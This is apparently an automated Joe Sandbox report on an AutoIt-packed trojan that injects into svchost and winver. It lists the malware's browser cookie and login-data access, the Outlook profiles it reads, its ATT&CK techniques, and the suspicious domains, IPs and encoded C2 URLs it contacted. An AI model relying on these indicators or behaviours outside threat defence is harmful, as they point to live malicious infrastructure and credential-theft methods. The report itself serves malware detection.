                Source: FOTO#U011eRAFLAR.exe, GhotoFFnRo.exe, 00000005.00000002.3545735344.00000000013D0000.00000002.00000001.00040000.00000000.sdmp, GhotoFFnRo.exe, 00000005.00000000.1938162683.00000000013D0000.00000002.00000001.00040000.00000000.sdmp, GhotoFFnRo.exe, 00000007.00000000.2087251347.00000000011B0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: GhotoFFnRo.exe, 00000005.00000002.3545735344.00000000013D0000.00000002.00000001.00040000.00000000.sdmp, GhotoFFnRo.exe, 00000005.00000000.1938162683.00000000013D0000.00000002.00000001.00040000.00000000.sdmp, GhotoFFnRo.exe, 00000007.00000000.2087251347.00000000011B0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: GhotoFFnRo.exe, 00000005.00000002.3545735344.00000000013D0000.00000002.00000001.00040000.00000000.sdmp, GhotoFFnRo.exe, 00000005.00000000.1938162683.00000000013D0000.00000002.00000001.00040000.00000000.sdmp, GhotoFFnRo.exe, 00000007.00000000.2087251347.00000000011B0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: GhotoFFnRo.exe, 00000005.00000002.3545735344.00000000013D0000.00000002.00000001.00040000.00000000.sdmp, GhotoFFnRo.exe, 00000005.00000000.1938162683.00000000013D0000.00000002.00000001.00040000.00000000.sdmp, GhotoFFnRo.exe, 00000007.00000000.2087251347.00000000011B0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeCode function: 0_2_00D30618 cpuid 0_2_00D30618
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeCode function: 0_2_00D880B3 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,0_2_00D880B3
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeCode function: 0_2_00D6DA16 GetUserNameW,0_2_00D6DA16
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeCode function: 0_2_00D4BB0F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00D4BB0F
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeCode function: 0_2_00D1615E GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00D1615E

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000001.00000002.2012145210.0000000005860000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3546137914.0000000000F40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3545010767.0000000000830000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3547691925.0000000004ED0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2011124026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3546082583.0000000000EF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3546078918.0000000002AE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2011753567.0000000003B90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\winver.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
                Source: FOTO#U011eRAFLAR.exeBinary or memory string: WIN_81
                Source: FOTO#U011eRAFLAR.exeBinary or memory string: WIN_XP
                Source: FOTO#U011eRAFLAR.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
                Source: FOTO#U011eRAFLAR.exeBinary or memory string: WIN_XPe
                Source: FOTO#U011eRAFLAR.exeBinary or memory string: WIN_VISTA
                Source: FOTO#U011eRAFLAR.exeBinary or memory string: WIN_7
                Source: FOTO#U011eRAFLAR.exeBinary or memory string: WIN_8

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000001.00000002.2012145210.0000000005860000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3546137914.0000000000F40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3545010767.0000000000830000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3547691925.0000000004ED0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2011124026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3546082583.0000000000EF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3546078918.0000000002AE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2011753567.0000000003B90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeCode function: 0_2_00D9112B socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_00D9112B
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeCode function: 0_2_00D9172D socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00D9172D
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts
                1
                Native API
                1
                DLL Side-Loading
                1
                Exploitation for Privilege Escalation
                1
                Disable or Modify Tools
                1
                OS Credential Dumping
                2
                System Time Discovery
                Remote Services1
                Archive Collected Data
                4
                Ingress Tool Transfer
                Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault AccountsScheduled Task/Job2
                Valid Accounts
                1
                Abuse Elevation Control Mechanism
                1
                Deobfuscate/Decode Files or Information
                21
                Input Capture
                1
                Account Discovery
                Remote Desktop Protocol1
                Data from Local System
                1
                Encrypted Channel
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading
                1
                Abuse Elevation Control Mechanism
                Security Account Manager2
                File and Directory Discovery
                SMB/Windows Admin Shares1
                Email Collection
                4
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
                Valid Accounts
                3
                Obfuscated Files or Information
                NTDS116
                System Information Discovery
                Distributed Component Object Model21
                Input Capture
                4
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                Access Token Manipulation
                1
                DLL Side-Loading
                LSA Secrets241
                Security Software Discovery
                SSH3
                Clipboard Data
                Fallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
                Process Injection
                2
                Valid Accounts
                Cached Domain Credentials12
                Virtualization/Sandbox Evasion
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Virtualization/Sandbox Evasion
                DCSync3
                Process Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                Access Token Manipulation
                Proc Filesystem11
                Application Window Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
                Process Injection
                /etc/passwd and /etc/shadow1
                System Owner/User Discovery
                Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1554622 Sample: FOTO#U011eRAFLAR.exe Startdate: 12/11/2024 Architecture: WINDOWS Score: 100 28 www.smirpox.xyz 2->28 30 www.darkvader.xyz 2->30 32 13 other IPs or domains 2->32 42 Suricata IDS alerts for network traffic 2->42 44 Antivirus detection for URL or domain 2->44 46 Antivirus / Scanner detection for submitted sample 2->46 50 6 other signatures 2->50 10 FOTO#U011eRAFLAR.exe 1 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 30->48 process4 signatures5 62 Binary is likely a compiled AutoIt script file 10->62 64 Found API chain indicative of sandbox detection 10->64 66 Writes to foreign memory regions 10->66 68 2 other signatures 10->68 13 svchost.exe 10->13         started        process6 signatures7 70 Maps a DLL or memory area into another process 13->70 16 GhotoFFnRo.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 winver.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 GhotoFFnRo.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.smirpox.xyz 203.161.46.201, 50031, 50032, 50033 VNPT-AS-VNVNPTCorpVN Malaysia 22->34 36 tempatmudisini06.click 103.21.221.4, 50027, 50028, 50029 LINKNET-ID-APLinknetASNID unknown 22->36 38 8 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                FOTO#U011eRAFLAR.exe71%ReversingLabsWin32.Trojan.AutoitInject
                FOTO#U011eRAFLAR.exe100%AviraDR/AutoIt.Gen8
                FOTO#U011eRAFLAR.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://www.t19yd.top/pmk2/?C0oD=3De3Y80JIFpHXFcRK4zsuRoR2JqTRvVObOTBM3no2IT+Ydj8n3o/JZofxiKD9jGsDaNhY1uQAIUnKpNiMGMuE6w7CVHn6nbaXTI3bq+rgxbHjMuEgJndnnM=&SJLty=7Zsl8bAHqdkHEnH0%Avira URL Cloudsafe
                http://www.fitlook.shop/34uy/0%Avira URL Cloudsafe
                http://www.smirpox.xyz/qnzs/0%Avira URL Cloudsafe
                http://www.smirpox.xyz/qnzs/?C0oD=GxkDHWsX54BcXdr+X4+GX30U3Lj5RtBkEtwzkqjSlwd5bhdVdKj3SOXRTkGfTnWing/dpWlHheQGrgb9DnLsoxo3QIxkxehw/T2sZhHOm+tURauy0yxjdNs=&SJLty=7Zsl8bAHqdkHEnH0%Avira URL Cloudsafe
                https://s3-us-west-2.amazonaws.com/s.cdpn.io/16327/MorphSVGPlugin.min.js0%Avira URL Cloudsafe
                http://www.qwibie.net/ow2x/0%Avira URL Cloudsafe
                http://www.mycleanupfiesta.live/a9if/0%Avira URL Cloudsafe
                http://www.43kdd.top/6iur/0%Avira URL Cloudsafe
                https://s3-us-west-2.amazonaws.com/s.cdpn.io/16327/SplitText.min.js0%Avira URL Cloudsafe
                http://www.nonpressure.beauty100%Avira URL Cloudmalware
                http://www.conansog.shop/4y21/?C0oD=mPRMxh+e+VE7Ove39Sw8dmi+aOJGAWH5jFedH8atyVdfIyLeJFBfjy5Y1KL2B+s6BQDtsLRij94DPPI3pu69UR9kCgLa8mV6DaG1kiIWnyUqRHhlgCWSgg4=&SJLty=7Zsl8bAHqdkHEnH0%Avira URL Cloudsafe
                http://www.qwibie.net/ow2x/?C0oD=mwEJPxghqBP0HS9n1X+CrOIbCVLsB2OYlrv9OZrAb/GKMQe/j/2ClGpq87hpEmyNapVO3nqvych02uE3cVtiKilbfBQm7ePgulBUbiKMxe88UCqWlHKJoDI=&SJLty=7Zsl8bAHqdkHEnH0%Avira URL Cloudsafe
                http://www.bookingservice.center/rw0k/?SJLty=7Zsl8bAHqdkHEnH&C0oD=2O+BQtagKd2e0tCHf7cQEGpCdZEKMcu8KUvQppDq45CT9l+c4kN/Nkqe5cwEa/TPiwCfdT9AeaeBmqjtzD2yf/vyAaenMmGVr/csdah4RHR/FTYhQMTHjoI=0%Avira URL Cloudsafe
                http://www.conansog.shop/4y21/0%Avira URL Cloudsafe
                http://www.fitlook.shop/34uy/?C0oD=KSNenRUz0x3jwwaFmZETAA9KYzPdWounuY72k7Av3QdD/OE/Wc5w7TzUcZjUVirDVR5tYsYUnylr3EOuBfofYgQDaG0iHWLP0vmwml0k5CsL5iUNPuoNBRw=&SJLty=7Zsl8bAHqdkHEnH0%Avira URL Cloudsafe
                http://www.43kdd.top/6iur/?C0oD=0nMJct3q1A3XzMXjE+ivshWrQE+XNY2vZkYEnxQvgljfmjLPkYHFjKqOBb0jruiOvYz34q23vFgZrlJgY/jJPVhUzqIQSZTSSXUfz9p/TbKa5+cetqeuNbw=&SJLty=7Zsl8bAHqdkHEnH0%Avira URL Cloudsafe
                http://www.t19yd.top/pmk2/0%Avira URL Cloudsafe
                http://www.tempatmudisini06.click/kfzf/0%Avira URL Cloudsafe
                http://www.mycleanupfiesta.live/a9if/?SJLty=7Zsl8bAHqdkHEnH&C0oD=NPCF0Cc5uwbi+9CdLylAZ+4kLxMnwTwBBFY+WmZ6z4eVD7VdFSaEtftDik7huU9slgF1galMdGpPyLMnTxOlI51ovglTUHTdL9cfhIyo0GaR7r/EyDMZf0s=0%Avira URL Cloudsafe
                http://www.tempatmudisini06.click/kfzf/?C0oD=745Y/jOyjUFFKVt1zrqnMxLflzH3xCS2ztdY3unhpOMZjpxTMolv6jL+LcLzYo7s20rMx9IK4inFAvVSlw+JL0dGgGxHe8jTeLADQYR7lRwUQufrcbnmx6Y=&SJLty=7Zsl8bAHqdkHEnH0%Avira URL Cloudsafe
                http://www.nonpressure.beauty/naci/100%Avira URL Cloudmalware
                NameIPActiveMaliciousAntivirus DetectionReputation
                qwibie.net
                3.33.130.190
                truetrue
                  unknown
                  www.smirpox.xyz
                  203.161.46.201
                  truetrue
                    unknown
                    www.mycleanupfiesta.live
                    172.67.137.238
                    truetrue
                      unknown
                      www.conansog.shop
                      104.21.41.74
                      truetrue
                        unknown
                        43kdd.top
                        38.47.232.202
                        truetrue
                          unknown
                          tempatmudisini06.click
                          103.21.221.4
                          truetrue
                            unknown
                            www.nonpressure.beauty
                            104.21.4.93
                            truetrue
                              unknown
                              www.fitlook.shop
                              13.248.169.48
                              truetrue
                                unknown
                                www.bookingservice.center
                                98.124.224.17
                                truetrue
                                  unknown
                                  t19yd.top
                                  38.47.207.164
                                  truetrue
                                    unknown
                                    www.tempatmudisini06.click
                                    unknown
                                    unknownfalse
                                      unknown
                                      www.t19yd.top
                                      unknown
                                      unknownfalse
                                        unknown
                                        www.qwibie.net
                                        unknown
                                        unknownfalse
                                          unknown
                                          www.43kdd.top
                                          unknown
                                          unknownfalse
                                            unknown
                                            www.darkvader.xyz
                                            unknown
                                            unknowntrue
                                              unknown
                                              NameMaliciousAntivirus DetectionReputation
                                              http://www.fitlook.shop/34uy/true
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.qwibie.net/ow2x/true
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.smirpox.xyz/qnzs/?C0oD=GxkDHWsX54BcXdr+X4+GX30U3Lj5RtBkEtwzkqjSlwd5bhdVdKj3SOXRTkGfTnWing/dpWlHheQGrgb9DnLsoxo3QIxkxehw/T2sZhHOm+tURauy0yxjdNs=&SJLty=7Zsl8bAHqdkHEnHtrue
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.smirpox.xyz/qnzs/true
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.mycleanupfiesta.live/a9if/true
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.t19yd.top/pmk2/?C0oD=3De3Y80JIFpHXFcRK4zsuRoR2JqTRvVObOTBM3no2IT+Ydj8n3o/JZofxiKD9jGsDaNhY1uQAIUnKpNiMGMuE6w7CVHn6nbaXTI3bq+rgxbHjMuEgJndnnM=&SJLty=7Zsl8bAHqdkHEnHtrue
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.43kdd.top/6iur/true
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.conansog.shop/4y21/?C0oD=mPRMxh+e+VE7Ove39Sw8dmi+aOJGAWH5jFedH8atyVdfIyLeJFBfjy5Y1KL2B+s6BQDtsLRij94DPPI3pu69UR9kCgLa8mV6DaG1kiIWnyUqRHhlgCWSgg4=&SJLty=7Zsl8bAHqdkHEnHtrue
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.fitlook.shop/34uy/?C0oD=KSNenRUz0x3jwwaFmZETAA9KYzPdWounuY72k7Av3QdD/OE/Wc5w7TzUcZjUVirDVR5tYsYUnylr3EOuBfofYgQDaG0iHWLP0vmwml0k5CsL5iUNPuoNBRw=&SJLty=7Zsl8bAHqdkHEnHtrue
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.qwibie.net/ow2x/?C0oD=mwEJPxghqBP0HS9n1X+CrOIbCVLsB2OYlrv9OZrAb/GKMQe/j/2ClGpq87hpEmyNapVO3nqvych02uE3cVtiKilbfBQm7ePgulBUbiKMxe88UCqWlHKJoDI=&SJLty=7Zsl8bAHqdkHEnHtrue
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.bookingservice.center/rw0k/?SJLty=7Zsl8bAHqdkHEnH&C0oD=2O+BQtagKd2e0tCHf7cQEGpCdZEKMcu8KUvQppDq45CT9l+c4kN/Nkqe5cwEa/TPiwCfdT9AeaeBmqjtzD2yf/vyAaenMmGVr/csdah4RHR/FTYhQMTHjoI=true
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.conansog.shop/4y21/true
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.t19yd.top/pmk2/true
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.tempatmudisini06.click/kfzf/true
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.43kdd.top/6iur/?C0oD=0nMJct3q1A3XzMXjE+ivshWrQE+XNY2vZkYEnxQvgljfmjLPkYHFjKqOBb0jruiOvYz34q23vFgZrlJgY/jJPVhUzqIQSZTSSXUfz9p/TbKa5+cetqeuNbw=&SJLty=7Zsl8bAHqdkHEnHtrue
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.tempatmudisini06.click/kfzf/?C0oD=745Y/jOyjUFFKVt1zrqnMxLflzH3xCS2ztdY3unhpOMZjpxTMolv6jL+LcLzYo7s20rMx9IK4inFAvVSlw+JL0dGgGxHe8jTeLADQYR7lRwUQufrcbnmx6Y=&SJLty=7Zsl8bAHqdkHEnHtrue
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.mycleanupfiesta.live/a9if/?SJLty=7Zsl8bAHqdkHEnH&C0oD=NPCF0Cc5uwbi+9CdLylAZ+4kLxMnwTwBBFY+WmZ6z4eVD7VdFSaEtftDik7huU9slgF1galMdGpPyLMnTxOlI51ovglTUHTdL9cfhIyo0GaR7r/EyDMZf0s=true
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.nonpressure.beauty/naci/true
                                              • Avira URL Cloud: malware
                                              unknown
                                              NameSourceMaliciousAntivirus DetectionReputation
                                              https://duckduckgo.com/chrome_newtabwinver.exe, 00000006.00000003.2204988527.000000000794E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://duckduckgo.com/ac/?q=winver.exe, 00000006.00000003.2204988527.000000000794E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  https://www.google.com/images/branding/product/ico/googleg_lodp.icowinver.exe, 00000006.00000003.2204988527.000000000794E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    http://www.nonpressure.beautyGhotoFFnRo.exe, 00000007.00000002.3547691925.0000000004F4B000.00000040.80000000.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: malware
                                                    unknown
                                                    https://s3-us-west-2.amazonaws.com/s.cdpn.io/16327/MorphSVGPlugin.min.jswinver.exe, 00000006.00000002.3547176638.0000000006296000.00000004.10000000.00040000.00000000.sdmp, GhotoFFnRo.exe, 00000007.00000002.3546321653.0000000003CA6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://s3-us-west-2.amazonaws.com/s.cdpn.io/16327/SplitText.min.jswinver.exe, 00000006.00000002.3547176638.0000000006296000.00000004.10000000.00040000.00000000.sdmp, GhotoFFnRo.exe, 00000007.00000002.3546321653.0000000003CA6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=winver.exe, 00000006.00000003.2204988527.000000000794E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=winver.exe, 00000006.00000003.2204988527.000000000794E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        https://cdnjs.cloudflare.com/ajax/libs/gsap/1.20.2/TweenMax.min.jswinver.exe, 00000006.00000002.3547176638.0000000006296000.00000004.10000000.00040000.00000000.sdmp, GhotoFFnRo.exe, 00000007.00000002.3546321653.0000000003CA6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                          high
                                                          https://www.ecosia.org/newtab/winver.exe, 00000006.00000003.2204988527.000000000794E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            https://ac.ecosia.org/autocomplete?q=winver.exe, 00000006.00000003.2204988527.000000000794E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchwinver.exe, 00000006.00000003.2204988527.000000000794E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                https://cdnjs.cloudflare.com/ajax/libs/meyer-reset/2.0/reset.min.csswinver.exe, 00000006.00000002.3547176638.0000000006296000.00000004.10000000.00040000.00000000.sdmp, GhotoFFnRo.exe, 00000007.00000002.3546321653.0000000003CA6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  high
                                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=winver.exe, 00000006.00000003.2204988527.000000000794E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    • No. of IPs < 25%
                                                                    • 25% < No. of IPs < 50%
                                                                    • 50% < No. of IPs < 75%
                                                                    • 75% < No. of IPs
                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                    103.21.221.4
                                                                    tempatmudisini06.clickunknown
                                                                    9905LINKNET-ID-APLinknetASNIDtrue
                                                                    172.67.137.238
                                                                    www.mycleanupfiesta.liveUnited States
                                                                    13335CLOUDFLARENETUStrue
                                                                    13.248.169.48
                                                                    www.fitlook.shopUnited States
                                                                    16509AMAZON-02UStrue
                                                                    104.21.4.93
                                                                    www.nonpressure.beautyUnited States
                                                                    13335CLOUDFLARENETUStrue
                                                                    38.47.207.164
                                                                    t19yd.topUnited States
                                                                    174COGENT-174UStrue
                                                                    38.47.232.202
                                                                    43kdd.topUnited States
                                                                    174COGENT-174UStrue
                                                                    3.33.130.190
                                                                    qwibie.netUnited States
                                                                    8987AMAZONEXPANSIONGBtrue
                                                                    203.161.46.201
                                                                    www.smirpox.xyzMalaysia
                                                                    45899VNPT-AS-VNVNPTCorpVNtrue
                                                                    98.124.224.17
                                                                    www.bookingservice.centerUnited States
                                                                    21740ENOMAS1UStrue
                                                                    104.21.41.74
                                                                    www.conansog.shopUnited States
                                                                    13335CLOUDFLARENETUStrue
                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                    Analysis ID:1554622
                                                                    Start date and time:2024-11-12 18:46:06 +01:00
                                                                    Joe Sandbox product:CloudBasic
                                                                    Overall analysis duration:0h 9m 11s
                                                                    Hypervisor based Inspection enabled:false
                                                                    Report type:full
                                                                    Cookbook file name:default.jbs
                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                    Run name:Run with higher sleep bypass
                                                                    Number of analysed new started processes analysed:8
                                                                    Number of new started drivers analysed:0
                                                                    Number of existing processes analysed:0
                                                                    Number of existing drivers analysed:0
                                                                    Number of injected processes analysed:2
                                                                    Technologies:
                                                                    • HCA enabled
                                                                    • EGA enabled
                                                                    • AMSI enabled
                                                                    Analysis Mode:default
                                                                    Analysis stop reason:Timeout
                                                                    Sample name:FOTO#U011eRAFLAR.exe
                                                                    renamed because original name is a hash value
                                                                    Original Sample Name:FOTORAFLAR.exe
                                                                    Detection:MAL
                                                                    Classification:mal100.troj.spyw.evad.winEXE@7/2@11/10
                                                                    EGA Information:
                                                                    • Successful, ratio: 75%
                                                                    HCA Information:
                                                                    • Successful, ratio: 96%
                                                                    • Number of executed functions: 41
                                                                    • Number of non-executed functions: 305
                                                                    Cookbook Comments:
                                                                    • Found application associated with file extension: .exe
                                                                    • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
